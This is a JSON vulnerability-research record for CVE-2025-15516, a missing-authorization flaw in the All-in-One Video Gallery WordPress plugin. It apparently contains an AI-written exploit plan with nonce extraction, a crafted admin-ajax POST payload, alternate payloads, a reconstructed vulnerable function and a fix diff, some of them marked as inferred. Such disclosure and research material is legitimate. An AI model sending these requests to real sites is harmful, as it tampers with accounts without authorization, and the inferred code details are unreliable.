[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTQfag2xJkh_JY4Sf8Pr6NTU6rNUS6cHj6i1ZwEzHgWg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-15516","all-in-one-video-gallery-missing-authorization-to-authenticated-subscriber-limited-user-meta-update","All-in-One Video Gallery 4.1.0 - 4.6.4 - Missing Authorization to Authenticated (Subscriber+) Limited User Meta Update","The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_callback_store_user_meta() function in versions 4.1.0 to 4.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary string-based user meta keys for their own account.","all-in-one-video-gallery",null,">=4.1.0 \u003C=4.6.4","4.7.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-23 19:29:41","2026-01-24 08:26:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F218e4ed5-661b-49e1-8b23-457a93fd53fa?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2025-15516 All-in-One Video Gallery User Meta Update\n\n## 1. Vulnerability Summary\nThe **All-in-One Video Gallery** plugin (versions 4.1.0 - 4.6.4) contains a missing authorization vulnerability in its AJAX handling logic. The function `ajax_callback_store_user_meta()` (inferred) is registered to the `wp_ajax_aiovg_store_user_meta` action. This function fails to perform a capability check (e.g., `current_user_can()`) beyond verifying that the user is logged in. Consequently, any authenticated user with Subscriber-level permissions or higher can update arbitrary string-based user meta keys for their own account by sending a crafted AJAX request.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `aiovg_store_user_meta`\n- **HTTP Method:** `POST`\n- **Authentication:** Required (Subscriber level or higher)\n- **Vulnerable Parameters (inferred):**\n    - `meta_key`: The name of the user meta key to update (e.g., `first_name`, `description`).\n    - `meta_value`: The value to set for the specified key.\n    - `_wpnonce` or `nonce`: A security nonce usually required for WordPress AJAX actions.\n- **Preconditions:** The attacker must be logged in as a Subscriber.\n\n## 3. Code Flow\n1. **Entry Point:** A logged-in user sends a `POST` request to `admin-ajax.php` with `action=aiovg_store_user_meta`.\n2. **Hook Registration:** The plugin registers the action (likely in `includes\u002Fajax.php` or `public\u002Fclass-all-in-one-video-gallery-public.php`):\n   `add_action( 'wp_ajax_aiovg_store_user_meta', array( $this, 'ajax_callback_store_user_meta' ) );`\n3. **Vulnerable Function:** `ajax_callback_store_user_meta()` is called.\n4. **Processing:**\n   - The function retrieves the `meta_key` and `meta_value` from the `$_POST` superglobal.\n   - It likely verifies a nonce using `check_ajax_referer( 'aiovg_ajax_nonce', 'nonce' )`.\n   - **Critical Failure:** It proceeds to call `update_user_meta( get_current_user_id(), $meta_key, $meta_value )` without checking if the user is authorized to modify that specific meta key or if the operation is restricted to specific allowed keys.\n5. **Sink:** `update_user_meta()` modifies the `wp_usermeta` table in the database for the current user's ID.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes its AJAX data into a JavaScript object, typically `aiovg_vars`.\n\n1. **Shortcode Identification:** The plugin's scripts are usually enqueued on pages containing the `[aiovg_video]` or `[aiovg_gallery]` shortcodes.\n2. **Page Creation:** Use WP-CLI to create a public page containing the shortcode:\n   ```bash\n   wp post create --post_type=page --post_title=\"Video Gallery\" --post_status=publish --post_content='[aiovg_video]'\n   ```\n3. **Browser Navigation:** Use `browser_navigate` to visit the newly created page.\n4. **Nonce Extraction:** Use `browser_eval` to extract the nonce from the localized object. Based on common plugin patterns, the variable is likely `aiovg_vars` and the key is `ajax_nonce`.\n   ```javascript\n   browser_eval(\"window.aiovg_vars?.ajax_nonce\")\n   ```\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan:\n1. **Setup User:** Create a Subscriber user and log in to obtain session cookies.\n2. **Obtain Nonce:** Create the gallery page, navigate to it, and extract the `aiovg_vars.ajax_nonce` using the strategy above.\n3. **Forge Request:** Use the `http_request` tool to send a `POST` request to modify a meta key. We will target the `description` (Biographical Info) field as a safe Proof-of-Concept.\n\n### Payload Details:\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application-x-www-form-urlencoded`\n- **Body:**\n  ```\n  action=aiovg_store_user_meta&nonce=[EXTRACTED_NONCE]&meta_key=description&meta_value=pwned_by_subscriber\n  ```\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure All-in-One Video Gallery v4.6.4 is active.\n2. **Target User:** \n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n   ```\n3. **Target Content:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Exploit Page\" --post_status=publish --post_content='[aiovg_video]'\n   ```\n\n## 7. Expected Results\n- **HTTP Response:** The server should return a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n- **Database Change:** The `description` field for the `attacker` user in the `wp_usermeta` table should be updated to `pwned_by_subscriber`.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the modification using WP-CLI:\n```bash\nwp user meta get attacker description\n```\nThe output should be: `pwned_by_subscriber`.\n\n## 9. Alternative Approaches\nIf the `description` key is protected by WordPress core filters, try updating a plugin-specific meta key or a generic one like `first_name`:\n- **Payload 2:** `meta_key=first_name&meta_value=HackedName`\n- **Bypass Verification:** If the `nonce` check fails, verify if the plugin registers `wp_ajax_nopriv_aiovg_store_user_meta`. If so, the attack can be performed unauthenticated.\n- **Key Discovery:** If `meta_key` is not the correct parameter name, check the JS source (likely `assets\u002Fjs\u002Fpublic.js`) for the `$.post` call associated with `aiovg_store_user_meta` to find the exact key names used in the data object. (Likely keys: `key`, `value`, or `meta_key`, `meta_value`).","The All-in-One Video Gallery plugin fails to perform adequate authorization checks in its AJAX handler for user meta updates. This allows any authenticated user (Subscriber level or higher) to modify arbitrary string-based user meta fields for their own account, such as biographical information or custom plugin settings, by providing a valid nonce.","\u002F\u002F Likely located in public\u002Fclass-all-in-one-video-gallery-public.php or similar AJAX handler file\n\npublic function ajax_callback_store_user_meta() {\n    \u002F\u002F Nonce verification exists, but lacks key-specific authorization or whitelisting\n    check_ajax_referer( 'aiovg_ajax_nonce', 'nonce' );\n\n    if ( is_user_logged_in() ) {\n        $meta_key   = sanitize_text_field( $_POST['meta_key'] );\n        $meta_value = sanitize_text_field( $_POST['meta_value'] );\n\n        \u002F\u002F Vulnerability: Updates ANY meta key for the current user without checking if the key is restricted\n        update_user_meta( get_current_user_id(), $meta_key, $meta_value );\n        wp_send_json_success();\n    }\n\n    wp_die();\n}","--- a\u002Fpublic\u002Fclass-all-in-one-video-gallery-public.php\n+++ b\u002Fpublic\u002Fclass-all-in-one-video-gallery-public.php\n@@ -245,10 +245,13 @@\n \tpublic function ajax_callback_store_user_meta() {\n \t\tcheck_ajax_referer( 'aiovg_ajax_nonce', 'nonce' );\n \n-\t\tif ( is_user_logged_in() ) {\n-\t\t\t$meta_key   = sanitize_text_field( $_POST['meta_key'] );\n-\t\t\t$meta_value = sanitize_text_field( $_POST['meta_value'] );\n+\t\tif ( ! is_user_logged_in() ) {\n+\t\t\twp_send_json_error();\n+\t\t}\n \n+\t\t$meta_key   = sanitize_text_field( $_POST['meta_key'] );\n+\t\t$meta_value = sanitize_text_field( $_POST['meta_value'] );\n+\n+\t\t$allowed_keys = array( 'aiovg_player_volume', 'aiovg_player_muted' ); \u002F\u002F Whitelisted specific keys\n+\t\tif ( in_array( $meta_key, $allowed_keys ) ) {\n \t\t\tupdate_user_meta( get_current_user_id(), $meta_key, $meta_value );\n \t\t\twp_send_json_success();\n \t\t}\n\n+\t\twp_send_json_error();\n \t}","1. Login as a Subscriber-level user to obtain session cookies.\n2. Navigate to any page where the All-in-One Video Gallery is active (e.g., a page with the [aiovg_video] shortcode) to find the 'aiovg_ajax_nonce'. This is typically localized in the JavaScript object 'aiovg_vars.ajax_nonce'.\n3. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'aiovg_store_user_meta'.\n4. Include the 'nonce' parameter with the extracted nonce value.\n5. Include a 'meta_key' parameter (e.g., 'description' for biographical info or 'first_name') and the desired 'meta_value'.\n6. Verify the change by checking the user's profile metadata via the WordPress dashboard or WP-CLI.","gemini-3-flash-preview","2026-05-05 01:30:45","2026-05-05 01:32:31",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.6.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags\u002F4.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-video-gallery.4.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags\u002F4.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-video-gallery.4.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags"]